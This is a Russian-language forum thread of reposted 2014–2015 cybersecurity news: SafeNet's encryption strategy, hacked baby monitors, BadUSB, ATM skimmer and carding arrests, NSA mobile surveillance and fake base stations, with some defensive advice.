Компания SafeNet, которая владеет несколькими производителями средств защиты, такими как Aladdin, Rainbow Technologies и Senetas, обнародовала новую концепцию безопасности. Она исходит из того, что защититься от проникновения хакеров в корпоративную сеть уже практически невозможно, это подтверждается и проведенными исследованиями. В частности 95% сотрудников подразделений, обеспечивающих информационную безопасность, применяют технологии защиты, которые скомпрометированы хакерами, но отказаться от их использования не могут. «Рано или поздно сеть вашей компании все равно взломают, — пояснил Сергей Кузнецов, директор представительства SafeNet. — Вам же нужно сделать так, чтобы нападающие не смогли нанести ущерб вашей компании».
Для этого компания предлагает использовать две базовые технологии — строгую аутентификацию и шифрование данных. Они позволят сохранить данные, даже если хакеры проникли в корпоративную сеть и украли из нее информацию. Важно, чтобы они не могли украсть еще и ключи шифрования, которые следует хранить в специальных аппаратных устройствах без возможности извлечения. Такие технологии SafeNet предлагает для самых разнообразных применений — от электронных сертификатов до потоковых шифраторов на скорости в 10 Гбит/с. «Основным секретом должен быть ключ шифрования, который невозможно будет украсть, по крайней мере не похитив сами устройства», — отметил Кузнецов.
Компания предполагает совершенствовать защиту в четырех основных областях: мобильных устройствах, облаках, виртуализации и Больших Данных (защита данных в крупных и распределенных системах хранения). Понятно, что когда речь идет о защите мобильных устройств, то подразумеваются защищенные методы аутентификации, такие как одноразовые пароли, сертификаты шифрования или специальные приложения для мобильных телефонов, обеспечение же защиты в облачных сервисах, виртуальных средах и системах хранения — это в основном аппаратное шифрование.
Аутентификация для мобильных устройств включает достаточно широкий набор устройств и решений, в том числе одноразовые пароли, которые присылаются на мобильное устройство или генерируются внутри него, дополнительные гаджеты для генерации паролей или электронных подписей на документы. В группе компаний SafeNet есть такие производители, как Aladdin с набором электронных ключей eToken и Rainbow с ключами iKey. При этом компания в разных странах предлагает разные решения обоих брендов, поддерживая до поры обоих производителей, но постепенно подводя к выбору того или иного поставщика. В этих областях новые разработки связаны в основном с интеграцией аппаратных хранилищ секретных ключей в мобильные устройства, SIM-карты и другие носители.
Облачные технологии с виртуализацией и защитой распределенных систем хранения данных требуют новых подходов в построении защищенных хранилищ, поскольку защита не должна мешать работе основных механизмов облака. Здесь компания предлагает аппаратные решения для защиты линий связи на оптических скоростях, устройства для хранения ключей шифрования — так называемые Hardware Security Module (HSM), решения для шифрования в распределенных системах хранения данных, программные и аппаратные продукты для шифрования виртуальных машин с хранением ключей шифрования на стороне клиента и многое другое. То есть предлагается максимально возможный набор аппаратных решений для защиты данных в облаках и широкий выбор методов аутентификации при доступе к ним.
Основной стратегией SafeNet является создание таких условий, при которых взлом систем защиты не принесет хакеру должного результата — ему не удастся подделать аутентификацию, поскольку он не сможет извлечь секретный ключ из аппаратного носителя, а проникнув в корпоративную сеть и уведя из нее данные, он не сможет их расшифровать, поскольку ключи будут находиться в аппаратных устройствах. И тогда даже в случае взлома корпоративной системы данные предприятия останутся в безопасности.

SAWWA
04.04.2014, 02:07
Хакер взламывал камеры наблюдения в домах американцев и пугал детей

В Техасе киберпреступник проникал в компьютерные системы жилых домов в поиске сигнала видеонянь — устройств наблюдения и оповещения, которые устанавливают в детских комнатах. Хакер использовал функцию дистанционного предупреждения, пугая по ночам детей страшным голосом.

Американские СМИ рассказали про случай семьи Гилберт из Техаса: странный шум в комнате своей двухлетней дочери Марк Гилберт уловил случайно. Войдя, он услышал жуткий голос, раздававшийся прямо из видеоняни, стоявшей на комоде. Незнакомец говорил с заметным европейским акцентом и ругался на маленькую девочку. Когда Гилберт вошёл, камера повернулась в его сторону, и голос начал сыпать проклятия и в адрес мужчины. Поняв, что кто-то взломал электронное устройство, перепуганный отец выдернул шнур гаджета из сети.
По словам специалистов, сегодня взломать можно все, что так или иначе подключено к интернету. Корреспондент телеканала ABC News провел эксперимент: включив видеоприемное устройство, он просто подъезжал максимально близко к дому, и приемник ловил и показывал с удивительной четкостью изображение, транслирующееся внутри дома видеоняней. Как правило, это были кроватки малышей, иногда угол камеры охватывал всю комнату. Молодые мамы, как и местная полиция, были шокированы: этот несложный прием играет на руку грабителям или психически нездоровым людям.

Эксперты предупреждают: если видеоняня работает при помощи Wi-Fi, то на сеть необходимо ставить защиту паролем. Но стоит отметить, что модель видеоняни, которую взломали в семье Гилберт, обладала производственной защитой от взлома, а домашние интернет-роутеры, как и сама камеры, были защищены паролем. Хакера, пугавшего детей, обнаружить не удалось.


а ведь видеоняня с каналом по незащищёной сети это источник информации о содержимом дома

SAWWA
28.05.2014, 02:45
Знаменитый хакер под угрозой тюрьмы помог правительству США предотвратить сотни кибератак

Экс-лидер хакерской группировки LulzSec Эктор Монсегур, которому грозило длительное тюремное заключение за организацию кибератак и хищение данных банковских карт, согласился сотрудничать с американским правительством и помог предотвратить не менее 300 хакерских атак на сети государственных учреждений, а также сдал своих бывших соратников.
Ожидается, что уже сегодня будет вынесен приговор известному хакеру Эктору Монсегуру, бывшему лидеру группировки LulzSec, также работавшего с Anonymous. Как стало известно из документов суда, сторона обвинения просит вынести ему мягкое наказание за «экстраординарное» сотрудничество с правительством.

Из судебных документов, которые оказались в распоряжении The New York Times, стало известно, что Монсегур помог предотвратить не менее 300 кибератак на сети государственных органов, в том числе Пентагона, NASA, Конгресса США, а также частных компаний, что предотвратило многомиллионные потери.

Летом 2011 года власти США арестовали 28-летнего хакера, причастного к атакам на сайты крупных международных компаний, правоохранительных органов и правительственных ведомств. После этого Монсегур начал сотрудничать со следствием и работать в качестве информатора ФБР.

Так, он подговорил хакеров из группировки Anonymous обойти защиту интернет-сайтов государственных структур ряда стран и похитить оттуда определённую информацию, сообщает The New York Times. Впоследствии эти данные загружались на серверы, контролируемые американскими спецслужбами.

Как утверждает американская газета, на счету Монсегура и его сообщников сотни атак на правительственные учреждения Ирана, Нигерии, Сирии, Пакистана, Турции, Польши, Ирака и Бразилии, совершённых в 2012 году. По его наводке ещё семь участников Anonymous были арестованы в США, Великобритании и Ирландии. Так, интернет-активист и музыкант Джереми Хаммонд, участник международной группы хакеров Anonymous, взломавший серверы частной разведывательной компании Statfor и передавший содержавшуюся на них информацию порталу WikiLeaks, приговорён к десяти годам тюремного заключения судьёй Лореттой Преской.

Изначально Монсегуру грозил более чем 20-летний срок, но теперь, после того, как прокуратура попросила судью о снисхождении, он может провести в тюрьме менее двух лет.


http : //russian. rt. com /article/33788#ixzz32xEMaGA2

SAWWA
21.06.2014, 17:35
20 июня 2014
Роман Савкив, IT.TUT.BY

В минувшие выходные белорусский образовательный центр "Лидер" пострадал от хакерской атаки на сервер офисной телефонии, говорят представители компании. Злоумышленник из Чехии подобрал пароль к аккаунту центра и за несколько часов "наговорил по телефону" в сети velcom на сумму 32 миллиона рублей.

В настоящее время номер velcom заблокирован. Образовательный центр принимает звонки от клиентов через других операторов, а мобильный оператор velcom пытается разобраться, кто должен возмещать ущерб от хакерской атаки.

"После анализа логов сервера стало известно, что звонили из "Лидера" в Западную Африку, в Гвинею, на платные короткие номера. Для взлома злоумышленники использовали брутфорс-атаку: автоматизированный подбор паролей простым перебором вариантов. Звонки разговорами не сопровождались, то есть выполнялись тоже автоматически", - рассказали IT.TUT.BY в образовательном центре.

"Филиалы нашего центра есть в 27 городах страны. Поэтому мы внедрили систему внутриофисной IP-телефонии, как только она появилась на рынке", - рассказывает директор образовательного центра Наталья Бухарова.

Как рассказали IT.TUT.BY представители velcom, в ходе осуществления регулярных мероприятий, направленных на обеспечение безопасности обслуживания абонентов, 15 июня специалистами оператора было выявлено многократное превышение уровня потребления трафика клиентом - юридическим лицом. "После неудачных попыток связаться с клиентом его обслуживание было приостановлено", - говорят в velcom.

"Компанией проведена оперативная проверка по обращению о "хакерской атаке на сервер телефонии", которая не выявила внешнего вторжения или несанкционированного вывода средств со счетов клиентов. По оценке специалистов компании, причиной значительного роста звонков могло быть использование клиентом - юридическим лицом нелицензионного программного обеспечения GSM-шлюза, которое было заражено вредоносной программой, инициирующей звонки с GSM-шлюза через SIM-карты клиента в Гвинею", - рассказали IT.TUT.BY в velcom.

Во избежание повторения аналогичных ситуаций компания velcom рекомендует использовать только сертифицированное оборудование и лицензионные программные продукты.

По словам Евгения Кучука, директора компании SASecurity Group, за семь лет работы в сфере информационной безопасности он сталкивался только с единичными случаями подобных атак в Беларуси. Хакерская атака с подобной суммой ущерба для счета клиента произошла в его практике впервые. Хотя для западных компаний этот риск уже считается стандартным: за 2013 год убытки от хакерских атак в мире составили более $400 млрд.

SAWWA
07.07.2014, 02:01
«Компьютерный глюк» открыл все двери в тюремном блоке (дважды)

13 июня 2013 года в тюрьме Turner Guilford Knight Correctional Center (Майами, Флорида) внезапно открылись все двери в крыле строгого режима. Из камер вышли особо опасные заключенные, несколько из них с холодным оружием напали на члена враждебной банды, так что он в итоге был вынужден прыгать со второго этажа, повредил позвоночник и сломал лодыжку.

Администрация тюрьмы заявила, что все двери открылись в результате «компьютерного глюка» в охранной системе тюрьмы стоимостью $1,4 млн.

Но эта версия выглядит весьма сомнительной, учитывая, что это уже второй случай, когда в блоке строго режима произошел такой инцидент с открытием всех дверей. Первый раз, вероятно, просто проверялась система и скорость реагирования охраны.

Журналисты газеты The Miami Herald воспользовались законном правом запроса на раскрытие информации. В результате, они получили от властей записи с видеокамер (http://www.miamiherald.com/2013/08/12/v-fullstory/3558520/video-shows-security-breach-inmate.html), которые подтверждает версию о преднамеренном взломе компьютерной системы. На записи ясно видно, что заключенные были готовы к открытию дверей, ждали этого, сразу же начали действовать по плану, достали ножи и пошли на «охоту».

Власти не имеют понятия, кто взломал охранную систему тюрьмы. Скорее всего, это произошло не снаружи, и изнутри тюремной локальной сети, имеющей довольно сложную конфигурацию (http : //www.blackcreekisc .com/PDFs/Black_Creek_Touchscreen_System-web.pdf): она включает в себя электронные замки, камеры видеонаблюдения, кард-ридеры и прочее оборудование.

https://lh6.googleusercontent.com/-_2Dxrk7P7n4/UhN8tE6nyHI/AAAAAAAALVA/6ekE-TeUKo8/s260-p/prison.jpg

SAWWA
11.07.2014, 16:58
Режим сброса смартфона к заводскому состоянию — не гарантия удаления личной информации
Смартфоны и коммуникаторы, Информационная безопасность*


Продавая свой телефон кому-либо, мы обычно пользуемся инструментом восстановления устройства до заводского состояния. Такой штатный инструмент есть практически в любом смартфоне, но речь сейчас — о девайсах на Android OS.

В принципе, ничего сложного — стер всю информацию, и телефон можно продавать. Но действительно ли информация удаляется. На днях сотрудникам компании AVAST пришла в голову мысль проверить, действительно ли личная информация пользователей удаляется безвозвратно. Для проверки этого на eBay было куплено 20 б/у смартфонов, у различных пользователей.

Затем сотрудники использовали некие «широко распространенные программные инструменты для восстановления стертых файлов». Оказалось, что восстановление состояния телефона до заводского состояния, т.е. «сброс», не гарантирует полного уничтожения личных данных.

Удалось восстановить массу информации:

Более 40000 стертых ранее фото;
Более 1500 семейных фото детишек;
Около 750 фотографий девушек и женщин в разной степени эээ одетости;
Около 250 селфи в стиле «ню»;
Более 1000 поисковых запросов Google;
Более 750 сообщений, включая электронную почту и смс;
Более 250 контактов и адресов электронной почты;
Четыре адресных карточки предыдущих владельцев со всеми данными;
Полностью заполненная заявка на получение кредита.


В общем, восстановлено было много чего интересного, а ведь все эти данные вроде как должны были быть безвозвратно удалены.

Есть один момент — в статье о своем «опыте», размещенной в блоге AVAST, авторы разместили и рекомендацию по использованию собственного приложения для надежного удаления данных, которое затирает файлы пользователя «поверху», исключая возможность их восстановления. Т.е. статья явно не опыт ради опыта, а опыт ради демонстрации возможностей своего приложения по безопасному затиранию файлов пользователя с мобильных устройств.

Тем не менее, стоит проверить собственные телефоны со «сбросом»- ведь если дело обстоит именно так, как описано в статье, может, корпорации Google стоит создать более надежный инструмент сброса?

Само собой, на рынке б/у устройств полным-полно устройств, с которых можно восстанавливать ранее стертую информацию. Это и флешки, и жесткие диски и все прочее. Но телефон — более личное устройство, чем та же флешка, и в памяти смартфона может храниться много чего интересного, относящегося к личности предыдущего владельца.

Так что все это стоит иметь в виду, прежде, чем продавать свой телефон, как считаете?

SAWWA
02.08.2014, 01:01
В USB обнаружена неустранимая уязвимость


Специалисты по безопасности Карстен Нол и Джейкоб Лелл обнаружили уязвимость в USB, не подвергающуюся устранению и позволяющую получать доступ к компьютеру пользователя. В качестве доказательства она написала вредоносное ПО BadUSB, распространяющееся через устройства, подключающиеся через USB. BadUSB может подменять файлы на компьютере и даже перенаправлять интернет-трафик пользователя, при этом обходя антивирусы.
Причина в том, что традиционно зловредное ПО находится в основной памяти USB-устройства, а создатели BadUSB вместо этого перепрограммируют управляющую устройством прошивку. С измененной прошивкой устройство, например, может начать вести себя как USB-клавиатура, отдавая компьютеру команды. И как любое зараженное устройство, подключенное по USB к компьютеру, может воздействовать на него, так и подвергшийся воздействию компьютер может впоследствии заражать все подключенное к нему.

По утверждению исследователей, простого способа справиться с этим не существует, и самый надежный способ защититься от новой уязвимости - использовать только собственные USB-устройства с собственными компьютерами.

Подробнее об обнаруженном Нол и Лелл собираются рассказать на конференции Black Hat (пройдет с 2 по 7 августа в Лас-Вегасе), ежегодно собирающей хакеров, действующих в мирных целях. IT.TUT.BY недавно перечислял главные заявления предыдущих Black Hat

SAWWA
14.08.2014, 01:25
В Москве сотрудники полиции задержали группу предполагаемых скиммеров

13 Августа 18:30
Сотрудникам отдела экономической безопасности и противодействия коррупции УВД по ЮЗАО поступила оперативная информация о том, что на территории Юго-Западного административного округа города Москвы действует организованная группа, участники которой причастны к попытке хищения денежных средств у держателей пластиковых карт.

В ходе оперативно-разыскных мероприятий полицейские установили, что двое уроженцев Молдовы поставили на банкомат, расположенный в офисе одного из банков, специальное считывающее устройство. Таким образом они получили информацию с 258 карт клиентов банка на сумму более 4,8 млн рублей. Однако злоумышленники не смогли похитить денежные средства клиентов финансового учреждения, так как карты были своевременно заблокированы службой безопасности банка. Вскоре подозреваемые были задержаны сотрудниками полиции.

В отношении задержанных возбуждено уголовное дело, избрана мера пресечения в виде заключения под стражу.

В настоящее время полицейские проводят мероприятия, направленные на установление дополнительных эпизодов противоправной деятельности задержанных.

Пресс-служба ГУ МВД России по г. Москве

SAWWA
09.09.2014, 00:22
Хакеры «взломали» клавиатуру
Специалисты по безопасности Карстен Нол и Якоб Лелл утверждают, что компьютерные вирусы и вредоносные коды могут храниться и передаваться не только через флеш-накопители, но и через периферийные устройства, использующие USB-подключение. То есть взлому теперь могут быть подвержены и прошивки таких USB-устройств, как, например, клавиатуры.
В подтверждение своих слов они написали программу BadUSB, которая устанавливается на периферийное устройство и полностью берет под контроль компьютер при подключении к нему по USB. На самом компьютере BadUSB способна изменять файлы или перенаправлять трафик посредством изменения DNS-записей. Главная опасность такого вредоносного кода в том, что его проблематично обнаружить и удалить, так как он находится не на самом компьютере, а в прошивке внешнего гаджета.

SAWWA
05.11.2014, 23:34
Могилевчанин по поддельным банковским картам пытался похитить 2 миллиона евро

Управлением Следственного комитета по Могилевской области завершено расследование уголовного дела по обстоятельствам хищения денежных средств в особо крупном размере по поддельным банковским платежным карточкам.

Как сообщает СК, обвиняемым по уголовному делу признан неработающий, ранее не судимый 38-летний могилевчанин. Он был задержан сотрудниками Государственного пограничного комитета Республики Беларусь и сотрудниками УВД Могилевского облисполкома при пересечении границы Украина - Республика Беларусь.

"Следствием установлено, что обвиняемый приобрел за пределами Республики Беларусь 88 поддельных банковских платежных карточек, при помощи которых совершал транзакции в банкоматах, принадлежащих банкам Республики Беларусь, расположенных на территории г. Могилева, г. Гомеля и г. Минска", - говорится в сообщении.

По данным следствия, обвиняемый, в период с февраля по апрель 2014 года пытался похитить более 200 млн рублей, находящихся на счетах иностранных граждан в банках Российской Федерации, Украины, Турции, США, Израиля и Белиза.

Однако по не зависящим от него обстоятельствам осуществить замысел не удалось - в большинстве случаев незаконных операций поддельные карточки были отклонены банкоматами. Но при этом ему удалось снять в банкоматах 44 млн руб.

Следователи проанализировали переписку обвиняемого и установили, что он похищал денежные средства с использованием поддельных банковских платежных карточек в Королевстве Таиланд. В этой стране он был арестован, но каким-то образом сумел уехать из страны. Кроме того, в переписке идет речь о том, что обвиняемый намеревался обналичить поддельную банковскую платежную карточку, на счете которой находится около 2 млн евро.

В ходе следствия было направлено поручение в НЦБ Интерпол в Республике Беларусь о передаче сведений в королевство Таиланд о задержании обвиняемого на территории Республики Беларусь за хищение денежных средств с использованием поддельных банковских платежных карточек. Кроме того, был направлен ряд международных поручений и просьб об оказании правовой помощи в Российскую Федерацию, Украину, Турцию, США, Израиль и Белиз о предоставлении сведений с банков, со счетов которых были похищены денежные средства.

СК сообщает, что были проведены допросы, изъято несколько десятков вещественных доказательств, среди которых записи камер видеонаблюдения, установленные на банкоматах.

Действия обвиняемого квалифицированы ч. 1 ст. 14, ч. 4 ст. 212 Уголовного кодекса Республики Беларусь (Покушение на хищение имущества путем введения в компьютерную систему ложной информации, сопряженное с несанкционированным доступом к компьютерной информации, совершенное в особо крупном размере).

Обвиняемый заключен под стражу. Следствием принято решение о передаче уголовного дела прокурору для направления в суд.
Читать полностью: http : // news. tut. by /society/422519.html

Двое наркозависимых минчан обналичили в банках более миллиона долларов
В результате лжепредпринимательской деятельности минчане причинили ущерб государству в размере около 300 тысяч долларов. Как установили сотрудники ОБЭП Октябрьского РУВД и прокуратуры столицы, подозреваемые обналичивали для различных фирм деньги в белорусских рублях, а после этого конвертировали их в валюту для своего заказчика, сообщает пресс-служба МВД.

Примечательно, что, несмотря на внушительные суммы сделок, за свои услуги двое жителей Минска (которые приходятся друг другу братьями) брали немного – около 200-300 тысяч за операцию.

Свой бизнес решили открыть ранее судимые и наркозависимые жители Минска. Они были зарегистрированы в качестве индивидуальных предпринимателей с видом деятельности "оптовая торговля строительными материалами".

"Однако никакой хозяйственной деятельности по реализации стройматериалов они не осуществляли, а работали под прикрытием запрещенной деятельности, связанной с обналичиванием денежных средств в белорусских рублях и последующей их конвертацией в доллары США, а оказывали такие услуги иным субъектам хозяйствования", - сообщила старший оперуполномоченный по особо важным делам ГУБЭП МВД Вероника Посметьева.

С октября 2012 по февраль 2013 года подозреваемые заключали фиктивные договоры купли-продажи с третьими лицами (заказчиками услуг), снимали со счетов белорусские рубли и обменивали их на валюту. Впоследствии они передавали доллары своим заказчикам. За один раз братья могли обменять в банке 15-20 тысяч долларов, а за одну неделю они могли провести 2-3 такие обменные операции. Таким образом, только за 5 месяцев подозреваемые приобрели в банках 1,2 млн долларов США, чем причинили ущерб государству в виде неуплаты налогов в размере 3,4 млрд рублей (около 300 тысяч долларов).

В настоящее время прокуратурой Октябрьского района г. Минска по материалам ОБЭП Октябрьского РУВД в отношении двух подозреваемых возбуждено уголовное дело за лжепредпринимательство, повлекшее причинение ущерба в особо крупном размере (ч. 2 ст. 234 УК РБ). Согласно уголовному законодательству, за совершение такого преступления может быть назначено наказание в виде лишения свободы на срок от 3 до 10 лет с конфискацией имущества или без конфискации. Уголовное дело для дальнейшего расследования направлено в Октябрьский районный отдел Следственного комитета Республики Беларусь.

SAWWA
24.11.2014, 20:02
34396
​СМИ: За кражу банковских паролей введут уголовную ответственность


Банкиры и депутаты выступили за введение в Уголовный кодекс РФ отдельной статьи, посвящённой фишингу. Это мошеннический способ получения данных о счетах граждан. Именно им чаще всего пользуются злоумышленники для несанкционированного использования пластиковых карт клиентов различных банков.
17.11.2014, 05:35


Оригинал статьи: http :// russian. rt. com/ article/59890#ixzz3K0BJXJck

34397

SAWWA
06.12.2014, 01:26
Производители замков как на Востоке , так и на Западе упорно пытаются создать замки, способные к открыванию при помощи телефона, а это не совсем хорошо, в свете информации от героя Советского Союза Эдика Сноудена многое проясняется для тех, кто ранее был довольно доверчивым, Ясно, что спецагенты из АНБ не будут проникать домой к слесарю Петровичу в попытке разжиться пачкой пельменей из морозилки:

Мобильные телефоны и тотальная слежка АНБ: как это работает

http://www.zamkidveri.com/forum/images/imported/2014/12/01b2551371c334c9d319d1b32f12adbd-1.png
Одна из первых неприятных новостей от Сноудена касалась подрыва доверия к технологиям криптозащиты. В рамках секретного проекта АНБ под названием Bullrun была получена возможность обхода многих систем шифрования – но не за счёт взлома, а за счёт эксплуатации закладок, специально оставленных производителями по требованию АНБ. А в некоторых случаях вендоров просто обязали сдавать агентству шифровальные ключи. Таким образом, были дискредитированы многие стандарты безопасности, считавшиеся надёжными и применявшиеся в крупном бизнесе и государственных организациях.

http://www.zamkidveri.com/forum/images/imported/2014/12/e12e891c34047934e9c0097c453c9653-1.png
Буквально на днях в СМИ появилось развитие этой истории – некоторые детали операции AuroraGold, в рамках которой АНБ следило за сотрудниками телекомов, читая их электронную переписку и внутренние документы. Уже в мае 2012 года АНБ собрало таким образом технические данные о 70% мобильных сетей всего мира. Под прослушку попала и GSM Association – международная организация телекомов, где разрабатываются рекомендации по новым стандартам связи. Цель операции AuroraGold – та же, что и у проекта Bullrun: внедрить закладки либо узнать об уязвимостях, которые помогут обойти алгоритм шифрования A5/3 и другие новые технологии защиты. Судя по документам из архива Сноудена, первые попытки взломать G4 удавались агентству АНБ ещё в 2010 году – то есть ещё до того, как этот «безопасный» стандарт получил широкое распространение.

Другой вектор атак АНБ – это мобильные ОS и приложения. Как выяснилось, спецслужба имеет доступ ко множеству данных на смартфонах: списки контактов и звонков абонентов, а также их SMS и GPS-данные. Для этого в АНБ были собраны команды хакеров, каждая из которых занималась взломом одной из популярных OS. В публикации немецкого журнала Spiegel подчёркивается, что одной из первых была взломана операционка Blackberry, хотя традиционно она считалась более защищенной, чем iOS и Android.
И конечно же, возможности прослушки значительно расширились благодаря развитию рынка мобильных приложений. Многие из них регулярно передают значительное количество пользовательских данных третьим сторонам. Таким образом, для подслушивания необязательно взламывать OS – достаточно убедить пользователя поставить себе «полезное» мобильное приложение.

Но ещё больше возможностей для слежки обнаружилось в самих сетях мобильной связи. В документах Сноудена нашлось описание шпионского каталога АНБ — проекта Ant, в котором есть решения для манипуляции мобильными сетями на все случаи жизни. Необязательно перехватывать данные через уязвимое ПО — можно установить закладки на стадии изготовления устройств связи. Вот, например, скомпрометированный радио-модуль для телефона:


http://www.zamkidveri.com/forum/images/imported/2014/12/a3bf0ad3abb18dabc8f37d1183ba47d3-1.png

Другой вариант — поддельные базовые станции, с помощью которых можно перехватывать трафик абонента и манипулировать данными на его телефоне:

http://www.zamkidveri.com/forum/images/imported/2014/12/980467a5e3382d373bff680c722c8c90-1.png


Определение местоположения с помощью сотовой сети — достаточно приблизительное. Для точного поиска жертвы на месте есть отдельный портативный инструмент:
Конечно, само по себе существование такого каталога устройств не означает, что кто-то уже использует их для тотальной слежки. Однако вслед за публикацией каталога стали появляться и свидетельства практического применения.

В сентябре 2014 года была обнаружена подозрительная будка на крыше IZD-Tower, напротив комплекса UNO-city (Венский международный центр). Будка огорожена прочным металлическим забором, под наблюдением 10 камер. Вероятнее всего, это поддельная базовая станция мобильной сети.
Вена является третьим городом-резиденцией ООН (после Нью-Йорка и Женевы), там же расположены штаб-квартиры ОПЕК и ОБСЕ. Вполне понятен интерес АНБ к месту, где собираются высокопоставленные лица большинства стран.
Такие базовые станции могут перехватить IMSI (так называемые IMSI-catcher), а затем через сеть SS7 отслеживать местоположение жертвы. Однажды отследив IMSI жертвы, можно отслеживать ее перемещение по всему миру до тех пор, пока пользователь не сменит SIM-карту. Подробнее о таких атаках мы уже рассказывали здесь.

Документы Сноудена говорят о том, что станция в Вене (Vienna-Annex) является лишь частью глобальной сети слежения SIGINT. Дальше уже можно искать по списку стран и городов, упомянутых в этих документах.
Кстати, американские спецслужбы не ограничиваются стационарными системами слежения. Они уже давно используют станции-перехватчики StingRay на специальных автомобилях, которые могут подъехать к заданной цели. А в ноябре журнал Wall Street Journal сообщил, что Министерство юстиции США использует самолеты Cessna с поддельными базовыми станциями для перехвата данных пользователей:

Кто виноват и что делать?

Прежде всего нужно отметить, что невзирая на громкие заголовки газет, описанные технологии сейчас доступны не только спецслужбам. По сути, прослушка мобильных сетей и защита от неё стали новым высокотехнологичным рынком. И как на всяком рынке, здесь постоянно появляются новые, более дешевые решения.

В августе 2014 года журнал Popular Science рассказал о том, как группа специалистов по безопасности ESD America продвигает собственную разработку – «особо защищенный» смартфон CryptoPhone 500 на базе Android. Поскольку подобных продуктов на рынке уже несколько, разработчики использовали небанальный рекламный ход. С помощью своего продвинутого смартфона они обнаружили на территории США 17 поддельных базовых станций, которые в принудительном порядке отключают шифрование данных.
Одну такую станцию прослушки обнаружили около крупного казино в Лас-Вегасе, ещё несколько — вблизи военных баз США. Кто, кроме АНБ, может использовать такую технику? Да кто угодно. Правда, коммерческие комплексы дороговаты — более $100 тыс. Однако можно значительно удешевить решение, если воспользоваться бесплатным ПО для создания своей собственной базовой станции.

Как от этого спастись? Один из вариантов уже упомянут выше – «защищенный» смартфон. Однако удовольствие недешёвое: CryptoPhone стоит $3.500. За эти деньги клиент получает «закрытие» ряда векторов атаки, которые фигурировали выше в нашем списке. В частности, здесь есть контроль известных уязвимостей Android OS, контроль подозрительной деятельности мобильных приложений, и даже мониторинг baseband-процессора: именно эта фича позволяет определить подключение фальшивой базовой станции-перехватчика, чего не замечают обычные смартфоны.

Защититься от поддельных базовых станций с обычным телефоном сложнее, но кое-что сделать всё-таки можно. В сетях UMTS (G3) используется взаимная аутентификация мобильной станции в сотовой сети, и сотовой сети — в мобильной станции. Поэтому одним из признаков прослушки является принудительное переключение из режимов G4 и G3 в менее безопасный режим G2. Если пользователь заранее отключит у себя 2G-режим, это усложнит злоумышленнику задачу перехвата радио-эфира. Некоторые модели мобильных телефонов позволяют переключать используемый тип сети.
Также во многих телефонах на базе Android есть сервисное меню, вызываемое командой *#*#4636#*#*, где можно выбрать тип сети. Правда, такое решение чревато повышенным потреблением батареи, а также потерей связи в случае отсутствия покрытия сети 3G.
Поддельные базовые станции позволяют перехватывать любые данные, передаваемые через сотовую сеть – однако для этого требуется физическое нахождение абонента в зоне действия базовой станции. Поэтому более продвинутым методом слежки можно считать атаки на сеть SS7, позволяющие перехватывать данные абонента, а также его местоположение, из любой точки земного шара. Здесь тоже есть свои коммерческие решения: в одном из прошлых постов мы рассказывали о системе SkyLock американской компании Verint, которая позволяет отслеживать любых абонентов по всему миру.

Как можно помешать прослушке в этом случае? Поскольку атаки базируются на легитимных сообщениях сигнальной сети SS7, грубая фильтрация этих сообщений может оказать негативное влияние на весь сервис. По опыту экспертов Positive Technologies, адекватная защита от атак на SS7 должна представлять собой комплекс мероприятий на стороне оператора, включая мониторинг трафика SS7 и «умный» контроль фильтрации, который позволяет блокировать только попытки атак и фрода. Подробнее о том, как это реализуется на основе наших продуктов, можно прочитать в статье «Безопасность сетей мобильной связи на основе SS7»

SAWWA
07.12.2014, 01:13
все новости
В Смоленской области направлено в суд уголовное дело о хищениях более 2,5 млн рублей с банковских карт

06 Декабря 12:15
В Смоленске сотрудникам полиции удалось доказать причастность обвиняемых к хищениям денег со счетов более 200 держателей банковских карт.

Из материалов уголовного дела следует, что преступления совершались осенью 2013 года. Именно тогда обвиняемые прибыли в Смоленск из другого региона и установили на трёх банкоматах специальные считывающие устройства, позволяющие собирать сведения о счетах и вкладах клиентов банков. По версии следствия, злоумышленники изготавливали дубликаты банковских карт, после чего снимали деньги со счетов граждан.

Сотрудниками отдела «К» областного УМВД личности подозреваемых были установлены. Злоумышленники были задержаны в Смоленске при попытке демонтировать считывающие устройства с банкоматов.

Представителем банка заявлен гражданский иск по уголовному делу на сумму свыше 2,5 миллионов рублей. На имущество обвиняемых наложен арест.

В настоящее время уголовное дело направлено в суд.

Пресс-служба УМВД России по Смоленской области

SAWWA
14.12.2014, 02:59
Сотрудники Аналитического Центра InfoWatch в течение 2012-2013 гг. опросили более 918 ИБ-специалистов и сотрудников ИТ-подразделений различных компаний.

Основные факты
77% руководителей и 85% сотрудников ИТ- и ИБ-служб считают, что опасность для бизнеса их работодателей связана не с внешними, а с внутренними угрозами.
73% руководителей ИТ- и ИБ-служб и более 77% сотрудников ИТ- и ИБ-служб не уверены в надежности корпоративных систем обеспечения информационной безопасности, функционирующих в их компаниях.
86% представителей среднего бизнеса и 75% респондентов из крупных компаний полагают, что их руководство будет охотнее инвестировать в ИБ, если доводить до него информацию о случившихся инцидентах..

SAWWA
06.01.2015, 00:09
Белорус похитил со счетов иностранцев более 100000 долларов
belnovosti.by

«Как было установлено главным следственным управлением, белорус 1990 года рождения входил в транснациональную преступную группу, которая занималась хищением денежных средств с банковских платежных карт посредством применения компьютерной техники», - уточнили в комитете. В течение трех лет обвиняемому удалось получить доход в размере более 1,6 млрд рублей. Для него единственным источником получения доходов была противоправная деятельность.

В его отношении было возбуждено уголовное дело по ч.4 ст.212 (хищение путем использования компьютерной техники), ч.2 ст.349 (несанкционированный доступ к компьютерной информации), ст.352 (неправомерное завладение компьютерной информацией) Уголовного кодекса Беларуси. Он находится под стражей. Материалы уголовного дела переданы прокурору для направления в суд.

В Следственном комитете пояснили, что обвиняемый по интернету получал информацию о реквизитах чужих банковских карточек. После этого молодой человек предлагал на форумах оказание услуг по покупке и доставке товаров из магазинов в США, Франции, Германии, Великобритании, России и Сербии, а также других стран со скидкой от 30 до 70%. Для покупки товаров он пользовался неправомерно полученными им реквизитами банковских платежных карточек. После доставки товара белорусские покупатели перечисляли обвиняемому денежные средства. Кардер, используя данную схему, трансформировал похищенные безналичные деньги в наличные. Чтобы скрыть следы преступления, он пользовался возможными мерами конспирации, однако это не помогло.

SAWWA
07.01.2015, 23:45
Фото знаменитостей было похищено путем кражи паролей, а не взлома iCloud , утверждает ЯБЛОКО
Сервисы Apple не были взломаны, когда похитители позарились на фото голливудских знаменитостей — говорится в сообщении корпорации. Атака хакеров была целенаправленной , и затрагивала конфиденциальные данные только конкретных лиц.

К такому же выводу пришли и специалисты ФБР, присоединившиеся к расследованию.

